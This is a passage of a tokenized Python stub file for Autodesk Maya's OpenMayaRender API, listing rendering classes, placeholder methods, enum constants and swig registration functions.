<EOL> def refresh ( * args , ** kwargs ) : <EOL> pass <EOL> def setCurrentCamera ( * args , ** kwargs ) : <EOL> pass <EOL> def startRegionRender ( * args , ** kwargs ) : <EOL> pass <EOL> def startRender ( * args , ** kwargs ) : <EOL> pass <EOL> def updatePixels ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MGeometryManager ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> def dereferenceDefaultGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> def getGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> def referenceDefaultGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> kDefaultCube = <NUM_LIT:2> <EOL> kDefaultPlane = <NUM_LIT:1> <EOL> kDefaultSphere = <NUM_LIT:0> <EOL> class MVaryingParameter ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def addElement ( * args , ** kwargs ) : <EOL> pass <EOL> def assign ( * args , ** kwargs ) : <EOL> pass <EOL> def destinationSet ( * args , ** kwargs ) : <EOL> pass <EOL> def dimension ( * args , ** kwargs ) : <EOL> pass <EOL> def getBuffer ( * args , ** kwargs ) : <EOL> pass <EOL> def getElement ( * args , ** kwargs ) : <EOL> pass <EOL> def getElementSize ( * args , ** kwargs ) : <EOL> pass <EOL> def getMaximumStride ( * args , ** kwargs ) : <EOL> pass <EOL> def getSourceSetName ( * args , ** kwargs ) : <EOL> pass <EOL> def getSourceType ( * args , ** kwargs ) : <EOL> pass <EOL> def getUpdateId ( * args , ** kwargs ) : <EOL> pass <EOL> def name ( * args , ** kwargs ) : <EOL> pass <EOL> def numElements ( * args , ** kwargs ) : <EOL> pass <EOL> def removeElements ( * args , ** kwargs ) : <EOL> pass <EOL> def semantic ( * args , ** kwargs ) : <EOL> pass <EOL> def semanticName ( * args , ** kwargs ) : <EOL> pass <EOL> def setSource ( * args , ** kwargs ) : <EOL> pass <EOL> def type ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> kBinormal = <NUM_LIT:8> <EOL> kChar = <NUM_LIT:3> <EOL> kColor = <NUM_LIT:4> <EOL> kDouble = <NUM_LIT:2> <EOL> kFloat = <NUM_LIT:1> <EOL> kInt16 = <NUM_LIT:5> <EOL> kInt32 = <NUM_LIT:7> <EOL> kInvalidParameter = - <NUM_LIT:1> <EOL> kNoSemantic = <NUM_LIT:0> <EOL> kNormal = <NUM_LIT:2> <EOL> kPosition = <NUM_LIT:1> <EOL> kStructure = <NUM_LIT:0> <EOL> kTangent = <NUM_LIT:7> <EOL> kTexCoord = <NUM_LIT:3> <EOL> kUnsignedChar = <NUM_LIT:4> <EOL> kUnsignedInt16 = <NUM_LIT:6> <EOL> kUnsignedInt32 = <NUM_LIT:8> <EOL> kWeight = <NUM_LIT:5> <EOL> class MRenderCallback ( _object ) : <EOL> def __disown__ ( self ) : <EOL> pass <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def postProcessCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def renderCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def shadowCastCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def addCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def removeCallback ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MUniformParameter ( _object ) : <EOL> def UIHidden ( * args , ** kwargs ) : <EOL> pass <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def assign ( * args , ** kwargs ) : <EOL> pass <EOL> def getAsBool ( * args , ** kwargs ) : <EOL> pass <EOL> def getAsFloat ( * args , ** kwargs ) : <EOL> pass <EOL> def getAsFloatArray ( * args , ** kwargs ) : <EOL> pass <EOL> def getAsInt ( * args , ** kwargs ) : <EOL> pass <EOL> def getAsString ( * args , ** kwargs ) : <EOL> pass <EOL> def getPlug ( * args , ** kwargs ) : <EOL> pass <EOL> def getSource ( * args , ** kwargs ) : <EOL> pass <EOL> def hasChanged ( * args , ** kwargs ) : <EOL> pass <EOL> def isATexture ( * args , ** kwargs ) : <EOL> pass <EOL> def keyable ( * args , ** kwargs ) : <EOL> pass <EOL> def name ( * args , ** kwargs ) : <EOL> pass <EOL> def numColumns ( * args , ** kwargs ) : <EOL> pass <EOL> def numElements ( * args , ** kwargs ) : <EOL> pass <EOL> def numRows ( * args , ** kwargs ) : <EOL> pass <EOL> def semantic ( * args , ** kwargs ) : <EOL> pass <EOL> def setAsBool ( * args , ** kwargs ) : <EOL> pass <EOL> def setAsFloat ( * args , ** kwargs ) : <EOL> pass <EOL> def setAsFloatArray ( * args , ** kwargs ) : <EOL> pass <EOL> def setAsInt ( * args , ** kwargs ) : <EOL> pass <EOL> def setAsString ( * args , ** kwargs ) : <EOL> pass <EOL> def setDirty ( * args , ** kwargs ) : <EOL> pass <EOL> def setEnumFieldNames ( * args , ** kwargs ) : <EOL> pass <EOL> def setKeyable ( * args , ** kwargs ) : <EOL> pass <EOL> def setRangeMax ( * args , ** kwargs ) : <EOL> pass <EOL> def setRangeMin ( * args , ** kwargs ) : <EOL> pass <EOL> def setSoftRangeMax ( * args , ** kwargs ) : <EOL> pass <EOL> def setSoftRangeMin ( * args , ** kwargs ) : <EOL> pass <EOL> def setUIHidden ( * args , ** kwargs ) : <EOL> pass <EOL> def setUINiceName ( * args , ** kwargs ) : <EOL> pass <EOL> def type ( * args , ** kwargs ) : <EOL> pass <EOL> def userData ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> kSemanticBackgroundColor = <NUM_LIT> <EOL> kSemanticBump = <NUM_LIT:11> <EOL> kSemanticBumpTexture = <NUM_LIT:30> <EOL> kSemanticColor = <NUM_LIT:9> <EOL> kSemanticColorTexture = <NUM_LIT> <EOL> kSemanticEnvironment = <NUM_LIT:12> <EOL> kSemanticFrameNumber = <NUM_LIT> <EOL> kSemanticLocalViewer = <NUM_LIT> <EOL> kSemanticNormal = <NUM_LIT:10> <EOL> kSemanticNormalTexture = <NUM_LIT> <EOL> kSemanticNormalizationTexture = <NUM_LIT> <EOL> kSemanticObjectDir = <NUM_LIT:1> <EOL> kSemanticObjectPos = <NUM_LIT:5> <EOL> kSemanticProjectionDir = <NUM_LIT:4> <EOL> kSemanticProjectionInverseMatrix = <NUM_LIT:20> <EOL> kSemanticProjectionInverseTransposeMatrix = <NUM_LIT> <EOL> kSemanticProjectionMatrix = <NUM_LIT> <EOL> kSemanticProjectionPos = <NUM_LIT:8> <EOL> kSemanticProjectionTransposeMatrix = <NUM_LIT> <EOL> kSemanticTime = <NUM_LIT:32> <EOL> kSemanticUnknown = <NUM_LIT:0> <EOL> kSemanticViewDir = <NUM_LIT:3> <EOL> kSemanticViewInverseMatrix = <NUM_LIT> <EOL> kSemanticViewInverseTransposeMatrix = <NUM_LIT> <EOL> kSemanticViewMatrix = <NUM_LIT:16> <EOL> kSemanticViewPos = <NUM_LIT:7> <EOL> kSemanticViewProjectionInverseMatrix = <NUM_LIT> <EOL> kSemanticViewProjectionInverseTransposeMatrix = <NUM_LIT> <EOL> kSemanticViewProjectionMatrix = <NUM_LIT> <EOL> kSemanticViewProjectionTransposeMatrix = <NUM_LIT> <EOL> kSemanticViewTransposeMatrix = <NUM_LIT> <EOL> kSemanticViewportPixelSize = <NUM_LIT> <EOL> kSemanticWorldDir = <NUM_LIT:2> <EOL> kSemanticWorldInverseMatrix = <NUM_LIT> <EOL> kSemanticWorldInverseTransposeMatrix = <NUM_LIT:15> <EOL> kSemanticWorldMatrix = <NUM_LIT> <EOL> kSemanticWorldPos = <NUM_LIT:6> <EOL> kSemanticWorldTransposeMatrix = <NUM_LIT> <EOL> kSemanticWorldViewInverseMatrix = <NUM_LIT> <EOL> kSemanticWorldViewInverseTransposeMatrix = <NUM_LIT> <EOL> kSemanticWorldViewMatrix = <NUM_LIT> <EOL> kSemanticWorldViewProjectionInverseMatrix = <NUM_LIT> <EOL> kSemanticWorldViewProjectionInverseTransposeMatrix = <NUM_LIT> <EOL> kSemanticWorldViewProjectionMatrix = <NUM_LIT> <EOL> kSemanticWorldViewProjectionTransposeMatrix = <NUM_LIT> <EOL> kSemanticWorldViewTransposeMatrix = <NUM_LIT> <EOL> kType1DTexture = <NUM_LIT:4> <EOL> kType2DTexture = <NUM_LIT:5> <EOL> kType3DTexture = <NUM_LIT:6> <EOL> kTypeBool = <NUM_LIT:1> <EOL> kTypeCubeTexture = <NUM_LIT:7> <EOL> kTypeEnum = <NUM_LIT:10> <EOL> kTypeEnvTexture = <NUM_LIT:8> <EOL> kTypeFloat = <NUM_LIT:3> <EOL> kTypeInt = <NUM_LIT:2> <EOL> kTypeString = <NUM_LIT:9> <EOL> kTypeUnknown = <NUM_LIT:0> <EOL> class MDrawProcedureBase ( _object ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def enabled ( * args , ** kwargs ) : <EOL> pass <EOL> def execute ( * args , ** kwargs ) : <EOL> pass <EOL> def name ( * args , ** kwargs ) : <EOL> pass <EOL> def setEnabled ( * args , ** kwargs ) : <EOL> pass <EOL> def setName ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MGeometryList ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def addLast ( * args , ** kwargs ) : <EOL> pass <EOL> def cullMode ( * args , ** kwargs ) : <EOL> pass <EOL> def geometry ( * args , ** kwargs ) : <EOL> pass <EOL> def isDone ( * args , ** kwargs ) : <EOL> pass <EOL> def length ( * args , ** kwargs ) : <EOL> pass <EOL> def next ( * args , ** kwargs ) : <EOL> pass <EOL> def objectToWorldMatrix ( * args , ** kwargs ) : <EOL> pass <EOL> def path ( * args , ** kwargs ) : <EOL> pass <EOL> def projectionMatrix ( * args , ** kwargs ) : <EOL> pass <EOL> def reset ( * args , ** kwargs ) : <EOL> pass <EOL> def setCurrentElement ( * args , ** kwargs ) : <EOL> pass <EOL> def viewMatrix ( * args , ** kwargs ) : <EOL> pass <EOL> MSetupFlags = None <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> kAll = - <NUM_LIT:1> <EOL> kCullCCW = <NUM_LIT:2> <EOL> kCullCW = <NUM_LIT:1> <EOL> kCullNone = <NUM_LIT:0> <EOL> kCulling = <NUM_LIT:4> <EOL> kFixedFunctionLighting = <NUM_LIT:2> <EOL> kMatrices = <NUM_LIT:1> <EOL> kNone = <NUM_LIT:0> <EOL> class MSwatchRenderRegister ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def registerSwatchRender ( * args , ** kwargs ) : <EOL> pass <EOL> def unregisterSwatchRender ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MFnRenderLayer ( OpenMaya . MFnDependencyNode ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def adjustmentPlug ( * args , ** kwargs ) : <EOL> pass <EOL> def externalRenderPasses ( * args , ** kwargs ) : <EOL> pass <EOL> def inCurrentRenderLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def inLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def isPlugAdjusted ( * args , ** kwargs ) : <EOL> pass <EOL> def layerChildren ( * args , ** kwargs ) : <EOL> pass <EOL> def listMembers ( * args , ** kwargs ) : <EOL> pass <EOL> def passHasLight ( * args , ** kwargs ) : <EOL> pass <EOL> def passHasObject ( * args , ** kwargs ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> def currentLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def defaultRenderLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def findLayerByName ( * args , ** kwargs ) : <EOL> pass <EOL> def listAllRenderLayers ( * args , ** kwargs ) : <EOL> pass <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MGeometryPrimitive ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def data ( * args , ** kwargs ) : <EOL> pass <EOL> def dataType ( * args , ** kwargs ) : <EOL> pass <EOL> def drawPrimitiveType ( * args , ** kwargs ) : <EOL> pass <EOL> def elementCount ( * args , ** kwargs ) : <EOL> pass <EOL> def uniqueID ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> kInvalidIndexType = <NUM_LIT:0> <EOL> kLineLoop = <NUM_LIT:4> <EOL> kLineStrip = <NUM_LIT:3> <EOL> kLines = <NUM_LIT:2> <EOL> kMaxDrawPrimitiveTypeIndex = <NUM_LIT:11> <EOL> kPoints = <NUM_LIT:1> <EOL> kPolygon = <NUM_LIT:10> <EOL> kQuadStrip = <NUM_LIT:9> <EOL> kQuads = <NUM_LIT:8> <EOL> kTriangleFan = <NUM_LIT:7> <EOL> kTriangleStrip = <NUM_LIT:6> <EOL> kTriangles = <NUM_LIT:5> <EOL> class MRenderTarget ( _object ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def height ( * args , ** kwargs ) : <EOL> pass <EOL> def makeTargetCurrent ( * args , ** kwargs ) : <EOL> pass <EOL> def width ( * args , ** kwargs ) : <EOL> pass <EOL> def writeColorBuffer ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> class MGeometryData ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def collectionNumber ( * args , ** kwargs ) : <EOL> pass <EOL> def data ( * args , ** kwargs ) : <EOL> pass <EOL> def dataType ( * args , ** kwargs ) : <EOL> pass <EOL> def elementCount ( * args , ** kwargs ) : <EOL> pass <EOL> def elementSize ( * args , ** kwargs ) : <EOL> pass <EOL> def elementType ( * args , ** kwargs ) : <EOL> pass <EOL> def elementTypeSize ( * args , ** kwargs ) : <EOL> pass <EOL> def objectName ( * args , ** kwargs ) : <EOL> pass <EOL> def objectOwnsData ( * args , ** kwargs ) : <EOL> pass <EOL> def setCollectionNumber ( * args , ** kwargs ) : <EOL> pass <EOL> def setObjectOwnsData ( * args , ** kwargs ) : <EOL> pass <EOL> def uniqueID ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> kAPISupported = <NUM_LIT:6> <EOL> kBiNormal = <NUM_LIT:8> <EOL> kChar = <NUM_LIT:2> <EOL> kColor = <NUM_LIT:4> <EOL> kColorMask = <NUM_LIT:11> <EOL> kDouble = <NUM_LIT:1> <EOL> kFloat = <NUM_LIT:0> <EOL> kFour = <NUM_LIT:4> <EOL> kInt16 = <NUM_LIT:4> <EOL> kInt32 = <NUM_LIT:6> <EOL> kInvalidDataType = <NUM_LIT:0> <EOL> kInvalidElementSize = <NUM_LIT:0> <EOL> kInvalidElementType = - <NUM_LIT:1> <EOL> kMaxDataTypeIndex = <NUM_LIT> <EOL> kNormal = <NUM_LIT:2> <EOL> kOne = <NUM_LIT:1> <EOL> kPosition = <NUM_LIT:1> <EOL> kPrimitiveCenter = <NUM_LIT:10> <EOL> kTangent = <NUM_LIT:7> <EOL> kTexCoord = <NUM_LIT:3> <EOL> kThree = <NUM_LIT:3> <EOL> kTwo = <NUM_LIT:2> <EOL> kUnsignedChar = <NUM_LIT:3> <EOL> kUnsignedInt16 = <NUM_LIT:5> <EOL> kUnsignedInt32 = <NUM_LIT:7> <EOL> kUserData = <NUM_LIT:12> <EOL> kVelocity = <NUM_LIT:9> <EOL> kWeight = <NUM_LIT:5> <EOL> class MCommonRenderSettingsData ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def getBufferName ( * args , ** kwargs ) : <EOL> pass <EOL> def getImageName ( * args , ** kwargs ) : <EOL> pass <EOL> def isAnimated ( * args , ** kwargs ) : <EOL> pass <EOL> def isMovieFormat ( * args , ** kwargs ) : <EOL> pass <EOL> def setFieldName ( * args , ** kwargs ) : <EOL> pass <EOL> def setPassName ( * args , ** kwargs ) : <EOL> pass <EOL> def shouldRenderFrameAtTime ( * args , ** kwargs ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> def getPostRenderFrameCmd ( * args , ** kwargs ) : <EOL> pass <EOL> def getPreRenderFrameCmd ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> customExt = None <EOL> customImageFormat = None <EOL> deviceAspectRatio = None <EOL> dotPerInch = None <EOL> enableDefaultLight = None <EOL> frameBy = None <EOL> frameEnd = None <EOL> framePadding = None <EOL> frameStart = None <EOL> height = None <EOL> imageFormat = None <EOL> name = None <EOL> namePattern = None <EOL> namingScheme = None <EOL> pixelAspectRatio = None <EOL> postMel = None <EOL> postRenderLayerMel = None <EOL> postRenderMel = None <EOL> preMel = None <EOL> preRenderLayerMel = None <EOL> preRenderMel = None <EOL> renderAll = None <EOL> renumberBy = None <EOL> renumberFrames = None <EOL> renumberStart = None <EOL> skipExistingFrames = None <EOL> thisown = None <EOL> useCustomExt = None <EOL> width = None <EOL> __swig_destroy__ = None <EOL> kFullPathImage = <NUM_LIT:1> <EOL> kFullPathTmp = <NUM_LIT:2> <EOL> kRelativePath = <NUM_LIT:0> <EOL> class MFnRenderPass ( OpenMaya . MFnDependencyNode ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def customTokenString ( * args , ** kwargs ) : <EOL> pass <EOL> def frameBufferChannels ( * args , ** kwargs ) : <EOL> pass <EOL> def frameBufferType ( * args , ** kwargs ) : <EOL> pass <EOL> def getImplementation ( * args , ** kwargs ) : <EOL> pass <EOL> def passID ( * args , ** kwargs ) : <EOL> pass <EOL> def setImplementation ( * args , ** kwargs ) : <EOL> pass <EOL> def usesFiltering ( * args , ** kwargs ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MFnImageSource ( OpenMaya . MFnDependencyNode ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def getImageName ( * args , ** kwargs ) : <EOL> pass <EOL> def sourceCamera ( * args , ** kwargs ) : <EOL> pass <EOL> def sourceLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MLightLinks ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def getIgnoredLights ( * args , ** kwargs ) : <EOL> pass <EOL> def getIgnoredObjects ( * args , ** kwargs ) : <EOL> pass <EOL> def getLinkedLights ( * args , ** kwargs ) : <EOL> pass <EOL> def getLinkedObjects ( * args , ** kwargs ) : <EOL> pass <EOL> def getShadowIgnoredLights ( * args , ** kwargs ) : <EOL> pass <EOL> def getShadowIgnoredObjects ( * args , ** kwargs ) : <EOL> pass <EOL> def getShadowLinkedLights ( * args , ** kwargs ) : <EOL> pass <EOL> def getShadowLinkedObjects ( * args , ** kwargs ) : <EOL> pass <EOL> def parseLinks ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MVaryingParameterList ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def append ( * args , ** kwargs ) : <EOL> pass <EOL> def assign ( * args , ** kwargs ) : <EOL> pass <EOL> def getElement ( * args , ** kwargs ) : <EOL> pass <EOL> def length ( * args , ** kwargs ) : <EOL> pass <EOL> def setElement ( * args , ** kwargs ) : <EOL> pass <EOL> def setLength ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class RV_PIXEL ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> a = None <EOL> b = None <EOL> g = None <EOL> r = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MRenderingInfo ( _object ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def cameraPath ( * args , ** kwargs ) : <EOL> pass <EOL> def height ( * args , ** kwargs ) : <EOL> pass <EOL> def originX ( * args , ** kwargs ) : <EOL> pass <EOL> def originY ( * args , ** kwargs ) : <EOL> pass <EOL> def projectionMatrix ( * args , ** kwargs ) : <EOL> pass <EOL> def renderTarget ( * args , ** kwargs ) : <EOL> pass <EOL> def renderingAPI ( * args , ** kwargs ) : <EOL> pass <EOL> def renderingVersion ( * args , ** kwargs ) : <EOL> pass <EOL> def viewMatrix ( * args , ** kwargs ) : <EOL> pass <EOL> def width ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> class MRenderProfile ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def addRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> def hasRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> def numberOfRenderers ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> kMayaD3D = <NUM_LIT:2> <EOL> kMayaOpenGL = <NUM_LIT:1> <EOL> kMayaSoftware = <NUM_LIT:0> <EOL> class MUniformParameterList ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def append ( * args , ** kwargs ) : <EOL> pass <EOL> def assign ( * args , ** kwargs ) : <EOL> pass <EOL> def getElement ( * args , ** kwargs ) : <EOL> pass <EOL> def length ( * args , ** kwargs ) : <EOL> pass <EOL> def setElement ( * args , ** kwargs ) : <EOL> pass <EOL> def setLength ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MHwrCallback ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def deviceDeleted ( * args , ** kwargs ) : <EOL> pass <EOL> def deviceLost ( * args , ** kwargs ) : <EOL> pass <EOL> def deviceNew ( * args , ** kwargs ) : <EOL> pass <EOL> def deviceReset ( * args , ** kwargs ) : <EOL> pass <EOL> def addCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def removeCallback ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MHwTextureManager ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> def deregisterTextureFile ( * args , ** kwargs ) : <EOL> pass <EOL> def glBind ( * args , ** kwargs ) : <EOL> pass <EOL> def registerTextureFile ( * args , ** kwargs ) : <EOL> pass <EOL> def textureFile ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> def MViewportRenderer_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MCommonRenderSettingsData_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_diffuseReflectance ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_startRender ( * args , ** kwargs ) : <EOL> pass <EOL> def _swig_setattr ( self , class_type , name , value ) : <EOL> pass <EOL> def MSwatchRenderRegister_registerSwatchRender ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_hemisphereCoverage ( * args , ** kwargs ) : <EOL> pass <EOL> def MD3D9Renderer_theRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> def _swig_getattr ( self , class_type , name ) : <EOL> pass <EOL> def MHwTextureManager_className ( * args , ** kwargs ) : <EOL> pass <EOL> def RV_PIXEL_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_className ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_raytraceFirstGeometryIntersections ( * args , ** kwargs ) : <EOL> pass <EOL> def MHardwareRenderer_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderCallback_addCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometry_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MGLFunctionTable_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MUniformParameterList_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderLayer_className ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_exactFileTextureName ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryManager_className ( * args , ** kwargs ) : <EOL> pass <EOL> def MVaryingParameter_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_renderPass ( * args , ** kwargs ) : <EOL> pass <EOL> def MHwrCallback_removeCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderingInfo_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderLayer_findLayerByName ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderLayer_defaultRenderLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def MLightLinks_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderLayer_listAllRenderLayers ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_maximumSpecularReflection ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_startRegionRender ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderLayer_currentLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def MHwTextureManager_deregisterTextureFile ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_relativeFileName ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderLayer_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MSwatchRenderRegister_unregisterSwatchRender ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryData_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_sendRenderProgressInfo ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_lightAttenuation ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderPass_className ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderTarget_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MSwatchRenderRegister_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_className ( * args , ** kwargs ) : <EOL> pass <EOL> def _swig_setattr_nondynamic_method ( set ) : <EOL> pass <EOL> def MRenderProfile_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderData_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_eval2dTexture ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_sampleShadingNetwork ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderCallback_removeCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def MCommonRenderSettingsData_getPreRenderFrameCmd ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryPrimitive_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryManager_getGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderPass_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_mainBeautyPassCustomTokenString ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_setCurrentCamera ( * args , ** kwargs ) : <EOL> pass <EOL> def MHwrCallback_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MSwatchRenderBase_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryRequirements_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MD3D9Renderer_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MHardwareRenderer_theRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_updatePixels ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_doesRenderEditorExist ( * args , ** kwargs ) : <EOL> pass <EOL> def 